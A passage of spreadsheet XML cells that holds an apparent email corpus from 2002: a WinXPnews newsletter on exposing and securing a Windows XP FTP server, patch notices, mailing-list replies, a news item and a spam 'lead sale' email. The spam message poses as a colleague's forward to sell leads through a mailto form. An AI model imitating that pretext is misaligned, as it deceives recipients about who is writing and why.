 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709S1-iHateSpam&amp;mid=9665862091709486" target="_top"&gt;
 &lt;img src='http://www.winxpnews.com/ads/ihs.gif' align='right' border='0'&gt;
 &lt;/a&gt;
 &lt;font face='verdana, sans-serif' size=2&gt;
 Irritated with porn, bogus business offers and viagra ads in your mailbox?&lt;br&gt;
 Angry about losing your valuable time deleting all that junk? Need a spam-&lt;br&gt;
 blocker that eliminates this annoying spam? Stop the spam in your inbox&lt;br&gt;
 with iHateSpam. It gives you control over the ever increasing flood of &lt;br&gt;
 junk email. Runs under Windows 95/98/ME/NT/2000/XP. Best of all, the limited&lt;br&gt;
 time Intro Offer is just $19.95 with online delivery of full product and a &lt;br&gt;
 30-day money back guarantee. This is a real no-brainer. &lt;b&gt;Get Your Copy Now!&lt;/b&gt;&lt;br&gt;
 &lt;b&gt;Visit &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709S1-iHateSpam&amp;mid=9665862091709486" target="_top"&gt;iHateSpam - Eliminate Irritating Junk Email&lt;/a&gt; for more information.&lt;/b&gt;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&amp;nbsp;&amp;nbsp;EDITOR'S CORNER&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;How to Publish Your Windows XP FTP Server to the Internet&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 Several of you wrote in about last week's article on installing an FTP Server. You said "that was great, but you only told half the story". You wanted to know two more things:
 &lt;ol&gt;
 &lt;li&gt;How to make the FTP Server available to Internet users
 &lt;li&gt;How to secure the FTP Server
 &lt;/ol&gt;
 There are several ways to make an FTP server on the internal network available to users on the Internet. These methods are referred to as "Server Publishing". You can use a Windows XP computer running Internet Connection Services (ICS) to publish a server on your internal network.
 &lt;p&gt;
 Let's take a look at a common scenario. You have a Windows XP computer connected to the Internet with an always-on cable or DSL connection. You have another computer on your private network also running Windows XP. You've installed the FTP Server on this internal network computer and put files into the FTP folder. Now you want Internet users to connect to the FTP Server through the ICS computer directly connected to the Internet.
 &lt;p&gt;
 You can do this with the Windows XP ICS! Here's how:
 &lt;ol&gt;
 &lt;li&gt;Go into the Network Connections window. You can get there from the Network applet in the Control Panel.
 &lt;li&gt;Right click the network interface directly connected to the Internet and click Properties.
 &lt;li&gt;Click on the Advanced tab in the connection's Properties dialog box. Put a checkmark in the Internet Connection Firewall checkbox. Always make sure the Internet Connection Firewall (ICF) is enabled when you connect a computer directly to the Internet.
 &lt;li&gt;Click the Settings button, then click on the Services tab in the Advanced Settings dialog box.
 &lt;li&gt;Now click the Add button. This brings up the Service Settings dialog box. Type in My FTP Server in the Description of service text box. In the Name or IP address text box, type in the IP address of the computer on your private network that's running the FTP server. Since you're using ICS, it'll have an IP address like 192.168.0.x, where x is different for each machine on your network. You might want to manually assign the IP address the FTP Server already has, so that it doesn't change in the future. You can find out what IP address your FTP server is using by opening a command prompt at the FTP server and typing in the command ipconfig. That will give you the IP address the FTP Server is using. Back to the Service Settings dialog box, select the TCP option button. For the External Port and the Internet port, put in the port number you assigned to the FTP server on your internal network. Read this week's How To section to see how to change the listening port number. Clic!
 k OK
 &lt;li&gt;Click OK, and then click OK one more time! You might need to disable and enable the adapter after making the change. You can do that by right clicking the always-on interface.
 &lt;/ol&gt;
 The procedure is very similar for dial-up connections. However, there are problems with dial-up connections (and many always-on connections) because the IP address on the external interface of the ICS computer changes over time. Next week I'll share with you a cool way you can get around this problem by using something called a "dynamic DNS service". I've used one for years, and it works great. Make sure to tune in next week for the details.
 &lt;p&gt;
 There you have it. Is server publishing in your future? Have any questions on the method I described above? If so, let me know! There are lots of ways you can publish services. Tell me how you do it, and tricks you've learned along the way. If you're having problems with server publishing, let me know about those too! I'll be sure to include what I learn from you in upcoming newsletters.
 &lt;p&gt;
 Until next week,&lt;br&gt;
 Tom Shinder, Editor&lt;br&gt;
 (email us with feedback: &lt;a href="mailto:feedback@winxpnews.com?subject=WinXPnews Issue #33"&gt;feedback@winxpnews.com&lt;/a&gt;)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&amp;nbsp;&amp;nbsp;SPONSOR: Is Your PC Spying On You?&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709S2-PestPatrol&amp;mid=9665862091709486" target="_top"&gt;
 &lt;img src='http://www.winxpnews.com/ads/pestpatrol.gif' align='right' border='0'&gt;
 &lt;/a&gt;
 &lt;font face='verdana, sans-serif' size=2&gt;
 You are surfing the Web. Check out sites, download some music or&lt;br&gt;
 software that might be cool. Guess what? Your PC might have picked up&lt;br&gt;
 a cyber transmitted disease (CTD). These pests might now be monitoring &lt;br&gt;
 what you are doing and report this back to their "black hat" owners &lt;br&gt;
 and reveal your personal information. PestPatrol kills 'em all off. &lt;br&gt;
 Get your copy on the online shop for just 30 bucks with immediate online&lt;br&gt; delivery. Protect your PC and your confidential data!&lt;br&gt;
 &lt;b&gt;Visit &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709S2-PestPatrol&amp;mid=9665862091709486" target="_top"&gt;Is Your PC Spying On You?&lt;/a&gt; for more information.&lt;/b&gt;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&amp;nbsp;&amp;nbsp;HINTS, TIPS, TRICKS &amp; TWEAKS&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;Allow Dial-up Connections to Synchronize Time with Internet Time Servers&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 Do you use a dial-up connection but can't get your machine to synchronize its clock with an Internet time server when the Internet Connection Firewall (ICF) is enabled? If so, here's a tip Richard Surry sent in on how to fix the problem:
 &lt;ol&gt;
 &lt;li&gt;Open your Network Connections window from the start menu.
 &lt;li&gt;Right click on your modem (or other dial-up connection) and click Properties.
 &lt;li&gt;Click on the Advanced tab. You already have a checkmark in the box that enables the ICF. Click on the Settings button.
 &lt;li&gt;Click on the Services tab, then click on the Add button in the Services tab.
 &lt;li&gt;That should open the Service Settings dialog box. In the Description box, put in Internet Time Service. For the Name or IP address of the computer hosting this service on your network, type in 127.0.0.1. Select the TCP  protocol option button. For both the external and internal port numbers, type 123.
 &lt;li&gt;If you're online, disconnect and reconnect. Now synchronize the time by double click on the clock in the system tray and going to the Internet Time tab.
 &lt;/ol&gt;
 This is an interesting tip, and it represents an even more interesting problem. For you network geeks out there, I'll ask you this question: Why should we allow unsolicited inbound connections for the Internet Time Service? The ICF should not block responses to solicited outbound connections, so why should we have to enable reverse NAT to make this work?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&amp;nbsp;&amp;nbsp;HOW TO'S: ALL THE NEW XP FEATURES&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;How to Secure an FTP Server on Windows XP Professional&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 Last week we went over how to install the Windows XP FTP Server. It will work fine after going through the steps outlined last week, but several of you asked for more information on how to secure the FTP Server because you wanted to connect it to the Internet. It's a very good idea to understand how FTP security works before putting the server on the Internet. Here are some suggestions:
 &lt;ol&gt;
 &lt;li&gt;Open the Internet Information Services console from the Administrative Tools menu. In the left pane of the console, expand your server name and then expand the FTP Sites node.
 &lt;li&gt;Right click on the Default FTP Site and click the Properties command.
 &lt;li&gt;Click on the FTP Site tab. Notice that the default TCP Port is set to 21. This is the well-known port for FTP. You can increase security a bit by changing this port to another value that's in the 1026-65534 range. This secures it from poorly motivated click-kiddies and also allows you to get around your ISP blocking incoming connections to TCP port 21. Friends who connect to your FTP server will need to change the port number on their FTP client software as well.
 &lt;li&gt;The Windows XP FTP server has a hard coded limit of 10 simultaneous connections. You might want to change this to a lower number to reduce the chance of a LAN party on the external interface of the FTP server.
 &lt;li&gt;Put a checkmark in the Enable Logging checkbox. Click the Properties button to the right of the log format drop-down list box. Click the Daily option button on the General Properties tab. On the Extended Properties tab, select all of the Extended Properties. Click OK.
 &lt;li&gt;Click on the Security Accounts tab. Place a checkmark in the Allow only anonymous connections checkbox. This prevents users from sending username and password credentials to the FTP server. You don't want users to send credentials because those credentials are sent in "clear text", which can be read by anyone who's listening on the wire.
 &lt;li&gt;Click the Messages tab. Enter a Welcome message, an Exit message, and a message users will see if there are no available connections.
 &lt;li&gt;Click on the Home Directory tab. Make sure there is a checkmark in the Read and Log Visits checkboxes. REMOVE the checkmark in the Write checkbox. Note the location in the Local Path text box. Navigate to that path in the Windows Explorer.
 &lt;li&gt;Right click on the FTPROOT folder and click Properties.
 &lt;li&gt;Click on the Security tab. Make sure that SYSTEM has Full Control. Assign the IUSR_&lt;computername&gt; account READ access only. Remove all other permissions for the IUSR account. Make sure you give Adminstrators Full Control tool. This allows you, the administrator on the FTP Server computer, to add, remove and change files in the FTPROOT folder.
 &lt;/ol&gt;
 Stop and restart the FTP Server. Now your FTP server is secure and Internet bad guys won't be able to use it to distribute porno and bootlegged software.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&amp;nbsp;&amp;nbsp;WINXP SECURITY: UPDATES &amp; PATCHES&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;Cumulative Patch for Windows Media Player&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 I think it was a couple months ago when I wrote about some serious problems with the Windows Media Player (WMP). At that time you could download a "cumulative" patch that would update the Media Player with the latest security fixes. Well, it's time to download another "cumulative" patch! A couple other problems were found in WMP that could cause some problems. To read more about the problem head on over to:&lt;bR&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709SE-WMP_Patch&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709SE-WMP_Patch&lt;/a&gt;
 &lt;p&gt;
 You'll also find the download locations for Windows Media Player versions 6.4, 7.1 and 8.0 (XP) on that page.
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;Cumulative Patches for Excel and Word for Windows&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 If you run Microsoft Word or Excel, versions 2000 or 2002 (XP), then you need to head on over to the Microsoft site to download some security fixes. These fixes handle security glitches that could get you in trouble if you don't take care of them! Head on over to Microsoft's site where you can find individual fixes for each program. You only need download the fix that applies to your computer:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709SE-Word_Excel_Patch&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709SE-Word_Excel_Patch&lt;/a&gt;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&amp;nbsp;&amp;nbsp;UPGRADING &amp; COMPATIBILITY ISSUES&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;A Computer May Hang During a Heavy Load with an Ericsson HIS Modem&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 If your computer has a Ericsson HIS modem, you might experience a dreaded blue screen and see the message IRQL_NOT_LESS_OR_EQUAL or DRIVER_CORRUPTED_EXPOOL. The problem is that you're downloading too much and your poor modem can't keep up! Microsoft recognizes that this isn't a problem with the modem, but with the modem driver. To download a fix visit Microsoft's site. After getting the fix, you can download as much as you like without worrying about blue screens!&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709UP-HIS_Modem&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709UP-HIS_Modem&lt;/a&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;Knowledge Base Search Center - If it is Not Broke, Do Not Break it!&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 It wasn't so long ago when you could search the Microsoft Knowledge Base for articles that came up in the last 3 days, 7 days, 14 days, 30 days, 90 days and 6 months. It was great! But Microsoft decided to "fix" the Knowledge Base search page, and now it really sucks! It's hard to find things that used to come up easily, the site is often down, and searching based on age of articles just doesn't work anymore.
 &lt;p&gt;
 Try this: go to:&lt;br&gt;
 &lt;a href="http://support.microsoft.com/default.aspx?ln=EN-US&amp;pr=kbinfo&amp;" target="_top"&gt;http://support.microsoft.com/default.aspx?ln=EN-US&amp;pr=kbinfo&amp;&lt;/a&gt;&lt;br&gt;
 and on the left side of the page select Windows XP in the top drop down list box. Don't put anything in the For solutions containing...(optional) text box. Leave the Any of the words entered option selected in the Using drop down list box. For Maximum Age select 3 days. For Results Limit select 150 articles. Click Search Now. Whoa! Nothing. OK, it's reasonable to see no articles related to Windows XP in the last 3 days. Try again, this time using 7 days. Whaat? Still no articles. OK, it was a holiday week in the USA last week. Let's try 14 days. Nothing again! That seems sort of strange, doesn't it? Let's give it another try with 30 days. Still no articles! What's going on here? Keep trying for 6 months and one year. You still won't find anything. It's pretty sad, because this used to work.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&amp;nbsp;&amp;nbsp;WINXP CONFIGURING &amp; TROUBLESHOOTING&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;A Description of the Repair Option on a Local Area Network or High-Speed Internet Connection&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 Here's the answer to a question I've had for a long time. What the heck does that "Repair" option for a network connection actually do? It's not in the help file, but it's on the Microsoft Web site. Here's what it does:
 &lt;ul&gt;
 &lt;li&gt;Sends an ipconfig /renew
 &lt;li&gt;Flushes the ARP cache with a arp -d
 &lt;li&gt;Reloads the NetBIOS name cache with a nbtstat -R
 &lt;li&gt;Updates its WINS server with an nbtstat -RR
 &lt;li&gt;Clear out the DNS client cache with an ipconfig /flushdns
 &lt;li&gt;Reregisters the client with a DDNS server with a ipconfig /registerdns
 &lt;/ul&gt;
 Check out the original article over at:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Repair_Option&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Repair_Option&lt;/a&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;Keyboard and Mouse Do Not Work When You Start Windows&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 Have you been hit with this one? You're working in Windows XP and shut down for the day. The next morning you start up your Windows XP computer and the mouse pointer is stuck! The only way to get it going again is to restart the computer, and for some reason the pointer starts moving again. What's up with that? I still haven't figured that one out, but Microsoft has a KB article that claims it's from a corrupt registry. I doubt that's the case in my situation because the problem is intermittent. But if you find that your mouse is always stuck, you might want to check out:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Frozen_Mouse&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Frozen_Mouse&lt;/a&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;How to Deploy Windows XP Images from Windows 2000 RIS Servers&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 Are you planning to roll out lots of Windows XP computers on your network in the near future? If so, you're probably looking for a good way to automate the process. You can use the Windows 2000 Remote Installation Services (RIS) if you're running Windows 2000 Servers on your network. For the basic procedure and some tips, tricks, and gotcha's, check out:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Deploy_XP_Images&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709CO-Deploy_XP_Images&lt;/a&gt;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&amp;nbsp;&amp;nbsp;FAVE LINKS&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;This Week's Links We Like. Tips, Hints And Fun Stuff&lt;/b&gt;&lt;/font&gt;&lt;p&gt;&lt;li&gt;Be Afraid, be very afraid - the future of Big Brother in computing&lt;/li&gt;&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709FA-Palladium_FAQ&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709FA-Palladium_FAQ&lt;/a&gt;
 &lt;li&gt;Get Revenge on your computer!&lt;/li&gt;&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709FA-PC_Revenge&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709FA-PC_Revenge&lt;/a&gt;
 &lt;li&gt;Pringles Super Spud Boxing&lt;/li&gt;&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709FA-Spud_Boxing&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709FA-Spud_Boxing&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td background='http://www.winxpnews.com/graphics/h_border.gif' align=left&gt;
 &lt;img src='http://www.winxpnews.com/graphics/winxpnews_logo_50.jpg' width='53' height='24' align='right'&gt;
 &lt;font face='verdana, sans-serif' size='4' color='#ffffff'&gt;
 &amp;nbsp;&amp;nbsp;BOOK OF THE WEEK&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face='verdana, sans-serif' size='2'&gt;
 &lt;p&gt;&lt;font size=3&gt;&lt;b&gt;Windows XP Power Tools&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
 A book full of personal experiences and anecdotes that will equip you with the tips and tricks you need to become an XP afficionado. Coverage includes automating tasks using scripting, the Command Console Survivor Guide, networking, registry, maximizing security/firewalls, hardware, installation/configuration, and database hosting/accessing. The CD contains the best third party utilities around.
 &lt;p&gt;
 Step-by-Step Instruction Helps You Harness the Full Power of Windows XP. Whether you're running Windows XP Home Edition or Professional, Windows XP Power Tools arms you with the advanced skills you need to become the ultimate power user. Full of undocumented tips and tricks and written by a Windows expert, this book provides you with step-by-step instructions for customization, optimization, troubleshooting and shortcuts for working more efficiently. A must-have for power users and network administrators, Windows XP Power Tools includes a CD filled with power tools including security, e-mail, diagnostic and data recovery utilities.
 &lt;p&gt;
 &lt;a href="http://www.winxpnews.com/rd/rd.cfm?id=020709BW-XP_Power_Tools&amp;mid=9665862091709486" target="_top"&gt;http://www.winxpnews.com/rd/rd.cfm?id=020709BW-XP_Power_Tools&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" border="0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td background='http://www.winxpnews.com/graphics/h_border.gif' align=left&gt;
 &lt;img src='http://www.winxpnews.com/graphics/winxpnews_logo_50.jpg' width='53' height='24' align='right'&gt;
 &lt;font face='verdana, sans-serif' size='4' color='#ffffff'&gt;
 &amp;nbsp;&amp;nbsp;ABOUT WINXPNEWS&amp;#153;&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/font&gt;&lt;br&gt;
 &lt;font face='verdana, sans-serif' size=3&gt;&lt;b&gt;
 What Our Lawyers Make Us Say&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font size="1" face="arial"&gt;
 These documents are provided for informational purposes only. The information
 contained in this document represents the current view of Sunbelt Software
 Distribution on the issues discussed as of the date of publication. Because
 Sunbelt must respond to changes in market conditions, it should not be
 interpreted to be a commitment on the part of Sunbelt and Sunbelt cannot
 guarantee the accuracy of any information presented after the date of
 publication.
 &lt;p&gt;
 INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
 WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM
 FROM INFRINGEMENT.
 &lt;p&gt;
 The user assumes the entire risk as to the accuracy and the use of this
 &lt;code2=fsg.com&gt;document. This document may be copied and distributed subject to the
 following conditions: 1) All text must be copied without modification and all pages
 must be included; 2) All copies must contain Sunbelt's copyright notice and any
 other notices provided therein; and 3) This document may not be distributed
 for profit. All trademarks acknowledged. Copyright Sunbelt Software
 Distribution, Inc. 1996-2002.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size='1'&gt;&amp;nbsp;&lt;/font&gt;&lt;br&gt;
 &lt;font face='verdana, sans-serif' size=3&gt;&lt;b&gt;
 About Your Subscription to WinXPnews&amp;#153;&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font size="2" face="arial, verdana, sans-serif"&gt;
 This is a posting from WinXPnews. You are subscribed as cncnvc@fsg.com
 &lt;p&gt;
 To manage your profile, please visit our site by clicking on the following link:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/login.cfm?id=9665862091709486"&gt;
 http://www.winxpnews.com/login.cfm?id=9665862091709486&lt;/a&gt;&lt;br&gt;
 For a quick unsubscribe (gasp!), click here:&lt;br&gt;
 &lt;a href="http://www.winxpnews.com/unsubscribe.cfm?email=cncnvc@fsg.com"&gt;
 http://www.winxpnews.com/unsubscribe.cfm?email=cncnvc@fsg.com&lt;/a&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Global crash fears as German bank sinks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597653,215/
 Date: 2002-10-06T02:28:02+01:00
 *Business: *Stockbrokers around the world are braced for a potentially 
 calamitous week as alarm mounts over a looming, Thirties-style global financial 
 crisis.
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt;     Yeah, I need to work this out, too; I just learned my lesson about
 &gt;     living on the bleeding edge. Lesson learned?  NO MORE XIMIAN, UNDER
 &gt;     ANY CIRCUMSTANCES.  Man, that was annoying.
 We all learned that sooner or later, right? When I got down to that myself
 is when I started redhat.aldil.org, now known as freshrpms.net ;-)
 &gt;     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my
 &gt;     home directories, music and games on other partitions) and while I
 &gt;     have the 8.0 stuff in the list, everything I want to upgrade requires
 &gt;     200+ RPMs.
 &gt; 
 &gt;     I'm not opposed to this, but apt is.  "apt-get dist-upgrade" dumps
 &gt;     core.
 Strange.
 Anyway, although I'd easily recommend upgrading 7.x to 7.3 using apt, I
 wouldn't for 7.x to 8.0 as they are C++ binary incompatible... and apt is
 entirely written in C++ and dynamically linked :-/
 Still, that doesn't explain a core dump :-(
 &gt;     What's the inside secret here, or do I just start searching mirrors
 &gt;     for the ISO and get over it?
 Why "search"? There's more than enough to choose from here :
 http://freshrpms.net/mirrors/psyche.html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</si>
  <si>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Re[2]: Java is for kiddies
</t>
  </si>
  <si>
    <t xml:space="preserve">
 SL&gt; &lt;snip&gt;
 SL&gt; Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
 SL&gt; &lt;/snip&gt;
 &lt;snip&gt;
 SL&gt; Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
 SL&gt; come by. There's a company hiring in Mountain View, looking for a few good
 &lt;/snip&gt;
 I give Adam an hour or so to come up with an adequate number of
 excuses as to why -this- job isn't worth it.  :)
 GO Adam GO!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Times Square as it was
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524541
 Date: Not supplied
 [IMG: http://www.craphound.com/images/tsquarebw.jpg]
 Wonderful gallery of historical advertising and postcard photos of Times Square 
 at Lileks's site. Stefan urges us to "have some mercy on his bandwidth budget 
 and consider using the tip jar." Link[1] Discuss[2] (_Thanks, Stefan!_)) 
 [1] http://www.lileks.com/NYC/timessquare/index.html
 [2] http://www.quicktopic.com/boing/H/ZQS82idFZwr
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Got Leads?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 HEY, I AM FORWARDING YOU THE AD THEY SENT ME.
 I TRIED THE LEADS AND THINK WE SHOULD USE THEM FOR OUR TEAM.
 WHAT DO YOU THINK?
 THANKS,
 JOHN
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows=
 -1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;LEAD SALE EXTENDED&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000"&gt;
 &lt;form method=3D"POST" enctype=3D"text/plain" action=3D"mailto:thekey@btam=
 ail.net.cn?subject=3DNeed Leads"&gt;
   &lt;p&gt;&lt;b&gt; YOU HAVE BEEN INVITED TO JOIN THE CO-OP&lt;/b&gt;&lt;/p&gt;
   &lt;table border=3D"1" width=3D"102%" bordercolor=3D"#000080" bgcolor=3D"#=
 000080"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;&lt;b&gt;&lt;font size=3D"7" color=3D"#FFFFFF"&gt;LEAD SALE =
 EXTENDED&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table border=3D"0" width=3D"100%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000"&gt;We have=
  recently put
         together a lead co-op specifically for your group.&amp;nbsp; We have =
 been
         able to lock the price at as little as 50 cents per lead!!&amp;nbsp; =
 Leads
         are normally $1-$3 per...&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table border=3D"0" width=3D"100%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"16%" bordercolor=3D"#FFFFFF" bgcolor=3D"#FFFFFF"&gt;&amp;nbsp=
 ;&lt;/td&gt;
       &lt;td width=3D"84%"&gt;
         &lt;ul&gt;
           &lt;li&gt;
             &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000"&gt;So...=
 .&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
           &lt;li&gt;
             &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000"&gt;SIGN =
 UP TODAY....&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
           &lt;li&gt;
             &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000"&gt;GET O=
 UR LEADS....&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
           &lt;li&gt;
             &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000"&gt;AND G=
 ET TO WORK!!&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
         &lt;/ul&gt;
         &lt;table border=3D"0" width=3D"100%" bordercolor=3D"#000080" bgcolo=
 r=3D"#000080"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
